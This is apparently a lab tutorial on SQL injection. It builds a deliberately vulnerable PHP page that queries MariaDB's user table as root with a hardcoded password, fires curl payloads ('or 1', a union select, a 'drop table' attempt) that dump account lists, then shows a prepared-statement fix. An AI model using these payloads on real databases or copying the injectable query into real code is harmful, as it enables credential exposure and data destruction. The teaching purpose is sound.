$_GET['user'] reads the ?user=... query parameter appended to the PHP page's URL, and MYSQLI_NUM tells mysqli_fetch_array to return each row as a numerically indexed array.
[root@kvm3 ~]# cd /var/www/html/
[root@kvm3 html]# vim injection.php
[root@kvm3 html]# cat injection.php
<?php
$dbhost = 'localhost:3306';
$dbuser = 'root';
$dbpass = '123qwe';
$conn = mysqli_connect($dbhost, $dbuser, $dbpass) or die(mysqli_connect_error().PHP_EOL);
mysqli_select_db( $conn, 'mysql' ) or die('Error: '.mysqli_error($conn).PHP_EOL);
$sql = "SELECT host,user FROM user WHERE user={$_GET['user']}";
$retval = mysqli_query( $conn,$sql ) or die('Error: '.mysqli_error($conn).PHP_EOL);
while($row = mysqli_fetch_array($retval, MYSQLI_NUM)) {
    echo "HOST: {$row[0]}<br>User: {$row[1]}<br>".
         "--------------------------------<br>";
}
mysqli_free_result($retval);
echo "Fetched data successfully\n";
mysqli_close($conn);
?>
?user='root': the query returns the host and user of that one account.
[root@kvm3 html]# curl -s http://kvm3/injection.php?"user='root'" | sed 's/<br> */\n/g'
HOST: localhost
User: root
--------------------------------
Fetched data successfully
?user='a' or 1: the query returns every account. In the example %20 stands for a space; a literal space cannot be typed into the URL, otherwise $_GET will report an error.
[root@kvm3 html]# curl -s http://kvm3/injection.php?"user=\
'a'%20or%201" | sed 's/<br> */\n/g'
HOST: 192.168.122.1
User: hosttest
--------------------------------
HOST: localhost
User: dywang
--------------------------------
HOST: localhost
User: mariadb.sys
--------------------------------
HOST: localhost
User: mysql
--------------------------------
HOST: localhost
User: root
--------------------------------
Fetched data successfully
?user='a' union all select host,user from user: the query lists every host and user, because a union all ... clause can be injected into the WHERE condition.
[root@kvm3 html]# curl -s http://kvm3/injection.php?"user=\
'a'%20union%20all%20select%20host,user%20from%20user" | sed 's/<br> */\n/g'
HOST: 192.168.122.1
User: hosttest
--------------------------------
HOST: localhost
User: dywang
--------------------------------
HOST: localhost
User: mariadb.sys
--------------------------------
HOST: localhost
User: mysql
--------------------------------
HOST: localhost
User: root
--------------------------------
Fetched data successfully
?user='a'; drop table user: the query fails, because PHP's mysqli_query function accepts only a single statement; appending a semicolon to run a second statement is rejected.
[root@kvm3 html]# curl -s http://kvm3/injection.php?"user='a';drop%20table%20user"
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'drop table user' at line 1
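The single-statement limit of mysqli_query only stops the stacked `; drop table` payload; the `or 1` and `union all` payloads above still succeed because the parameter is pasted straight into the SQL text. The fix is to keep the query text fixed and send the value separately. The following is an added example, not the page's own injection.php: the same lookup rewritten with a mysqli prepared statement. The account name `app_reader`, the password placeholder and the allow-list pattern for account names are assumptions chosen for this example.

```php
<?php
// Added example (not the page's code): the host/user lookup from injection.php
// rewritten so that the ?user= value can never alter the SQL structure.
// Connection values below are constructed placeholders; app_reader is assumed
// to be a low-privilege account that can only read the user table.
$dbhost = 'localhost';
$dbport = 3306;
$dbuser = 'app_reader';
$dbpass = 'CHANGE_ME';   // placeholder
$dbname = 'mysql';

// Turn mysqli failures into exceptions instead of silently returning false.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$conn = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname, $dbport);

// Allow-list check (assumed policy): account names are short and contain only
// letters, digits, underscore, dot or dash. "'a' or 1" and "'a' union all ..."
// are rejected here with a 400 before any SQL is built.
$user = $_GET['user'] ?? '';
if (!preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $user)) {
    http_response_code(400);
    exit("invalid user parameter\n");
}

// The statement text is constant; "?" is a bound parameter, so even without the
// allow-list the value would be compared as a plain string, never parsed as SQL.
$stmt = mysqli_prepare($conn, 'SELECT host, user FROM user WHERE user = ?');
mysqli_stmt_bind_param($stmt, 's', $user);
mysqli_stmt_execute($stmt);
mysqli_stmt_bind_result($stmt, $host, $name);

$rows = 0;
while (mysqli_stmt_fetch($stmt)) {
    // Escape output so a stored value cannot inject HTML into the page.
    echo 'HOST: ' . htmlspecialchars($host) . '<br>User: ' . htmlspecialchars($name) . '<br>'
       . "--------------------------------<br>";
    $rows++;
}

mysqli_stmt_close($stmt);
mysqli_close($conn);
echo "Fetched $rows row(s)\n";
?>
```

With this version, `?user=root` returns the single root row as before, while `?user='a'%20or%201` and the union payload are refused by the allow-list; if the allow-list were removed, the bound value `'a' or 1` would simply match no account, because the parameter is transmitted as data and not spliced into the statement.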